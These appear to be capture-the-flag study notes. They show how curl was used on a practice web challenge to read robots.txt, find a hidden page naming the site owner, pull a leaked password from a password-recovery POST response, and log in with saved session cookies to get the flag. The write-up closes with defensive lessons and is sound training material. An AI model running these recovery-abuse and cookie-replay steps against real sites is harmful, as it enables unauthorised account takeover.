4 min read 830 words Updated Sep 12, 2026 Created Sep 12, 2026
##676767

Curl can be a powerful Linux tool for when there are no obvious. js files to click through and basic search in the web terminal doesn't come up with anything. It can be summed up as a method to get the entirety of the HTTPS response body, most of the time being HTML. It also is a method to manipulate the HTTPS GET requests and being able to inject and use POST methods to circumvent certain safeguards.

Let's do a hands-on example to follow from a past hackathon.
Hackathons/Spring 2026/Practice Game/Web Application Exploitation/Q1 Doge Community (Easy)

Why Use CURL?

Instead of relying on a browser, curl allows you to communicate directly with the web server and inspect exactly what is being sent and returned.

Benefits include:

  • Viewing raw HTTP responses
  • Sending custom POST requests
  • Testing hidden endpoints
  • Automating repetitive requests
  • Seeing headers, status codes, and redirects
  • Saving cookies for authenticated sessions

Q1 - What is the username of the website owner?

Objective

Identify the username of the website creator.

Step 1 - Enumerate the website

One of the first files worth checking on any web application is robots.txtas referenced in other Web App Exploitation notes in this section

curl https://09d1448f2fad32f616a700b8605a3a81-doge-community.web.cityinthe.cloud/robots.txt

Output:

User-agent: *
Disallow: /about

The /about page is hidden from search engines but still publicly accessible.


Step 2 - Visit the hidden page

curl https://09d1448f2fad32f616a700b8605a3a81-doge-community.web.cityinthe.cloud/about

The page states:

html><head><meta charset="UTF-8"/><meta http-equiv="X-UA-Compatible" content="IE=edge"/><meta name="viewport" content="width=device-width, initial-scale=1.0"/><script src="https://cdnjs.cloudflare.com/ajax/libs/jquery/3.5.0/jquery.min.js"></script><script src="https://cdnjs.cloudflare.com/ajax/libs/superagent/3.8.0/superagent.min.js"></script><script src="https://cdnjs.cloudflare.com/ajax/libs/lodash.js/4.17.11/lodash.min.js"></script><link rel="stylesheet" href="https://cdn.jsdelivr.net/gh/cyberskyline/semantic-ui@master/dist/semantic.min.css"/><link rel="stylesheet" href="/static/style.css"/><link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/5.15.3/css/all.min.css"/><title>Doge Community</title></head><body style="padding: 16px; background: #676767;"><div class="center"><div class="ear ear--left"></div><div class="ear ear--right"></div><div class="face"><div class="eyes"><div class="eye eye--left"><div class="glow"></div></div><div class="eye eye--right"><div class="glow"></div></div></div><div class="nose"><svg width="38.161" height="22.03"><path d="M2.017 10.987Q-.563 7.513.157 4.754C.877 1.994 2.976.135 6.164.093 16.4-.04 22.293-.022 32.048.093c3.501.042 5.48 2.081 6.02 4.661q.54 2.579-2.051 6.233-8.612 10.979-16.664 11.043-8.053.063-17.336-11.043z" fill="#243946"></path></svg><div class="glow"></div></div><div class="mouth"><svg class="smile" viewBox="-2 -2 84 23" width="84" height="23"><path d="M0 0c3.76 9.279 9.69 18.98 26.712 19.238 17.022.258 10.72.258 28 0S75.959 9.182 79.987.161" fill="none" stroke-width="3" stroke-linecap="square" stroke-miterlimit="3"></path></svg><div class="mouth-hole"></div><div class="tongue breath"><div class="tongue-top"></div><div class="line"></div><div class="median"></div></div></div></div><div class="hands"><div class="hand hand--left"><div class="finger"><div class="bone"></div><div class="nail"></div></div><div class="finger"><div class="bone"></div><div class="nail"></div></div><div class="finger"><div class="bone"></div><div class="nail"></div></div></div><div class="hand hand--right"><div class="finger"><div class="bone"></div><div class="nail"></div></div><div class="finger"><div class="bone"></div><div class="nail"></div></div><div class="finger"><div class="bone"></div><div class="nail"></div></div></div></div><div class="login" style="padding: 2em; margin-top: 2em;"><p>Founded in 2021, Doge Community is where all doge lovers can come together and meet other good boys and good girls. Have a suggestion? Find the creator of the website cheddar_holt</p></div><div class="footer" style="font-size: 0.75em; color: rgba(0,0,0,0.75);"><div>Doge Community Challenge | &copy; 2021 Cyber Skyline</div><div><a href="https://dribbble.com/shots/4485321-Login-Page-Homepage" style="color : rgba(0,0,0,0.75)">Design Inspiration by Neo</a></div></div></div></body></html>%

Within the chaos of the output, it states:

Find the creator of the website cheddar_holt

Answer

cheddar_holt

Q2 - What is the password of the account owner?

Objective

Recover the password for the discovered account.

Step 1 - Inspect the Forgot Password page

curl https://<target>](https://09d1448f2fad32f616a700b8605a3a81-doge-community.web.cityinthe.cloud/forgot

The page contains the following form:

<form action="/recover" method="post">

Step 2 - Submit the username

curl -X POST https://09d1448f2fad32f616a700b8605a3a81-doge-community.web.cityinthe.cloud/recover \
-d "username=cheddar_holt"

Instead of sending a password reset email, the application returns a page stating:

Welcome back, your password is shown below...

The password is visually obscured using an SVG overlay rather than being removed from the response.

This is an example of client-side redaction, where sensitive information is hidden visually but still delivered to the client.

Answer

SUPER_GOOD_BOY_PA$$WORD

Q3 - What is the flag obtained after you login?

Objective

Authenticate with the recovered credentials and retrieve the flag.

Step 1 - Login

curl -c cookies.txt \
-X POST https://09d1448f2fad32f616a700b8605a3a81-doge-community.web.cityinthe.cloud/login \
-d 'username=cheddar_holt&password=SUPER_GOOD_BOY_PA$$WORD'

The -c option saves the authenticated session cookie.

Or use the simple option of logging in with the information you have :) The next steps show how to save the cookie if the site credentials don't show the given endpoint.


Step 2 - Access the authenticated page

curl -b cookies.txt https://09d1448f2fad32f616a700b8605a3a81-doge-community.web.cityinthe.cloud/

The -b option sends the saved session cookie, allowing access as the authenticated user.


Step 3 - Locate the flag

Optionally search the response for the flag.

curl -b cookies.txt https://09d1448f2fad32f616a700b8605a3a81-doge-community.web.cityinthe.cloud/ | grep SKY

Answer

SKY-XXXX-XXXX

Lessons Learned

  • Always check robots.txt during reconnaissance.

  • Hidden pages often reveal usernames or other sensitive information.

  • Password recovery mechanisms should never reveal existing passwords.

  • Client-side hiding is not a security control.

  • curl is an excellent tool for web enumeration, endpoint testing, and interacting directly with HTTP services.

For CTFs and penetration testing, curl is one of the fastest ways to understand how a web application behaves because it exposes the raw HTTP traffic without any browser rendering or JavaScript getting in the way. It is a great tool as well to prevent AI hallucinations and being able to validate the direct information yourself without the struggle of navigating UI of a program or the site itself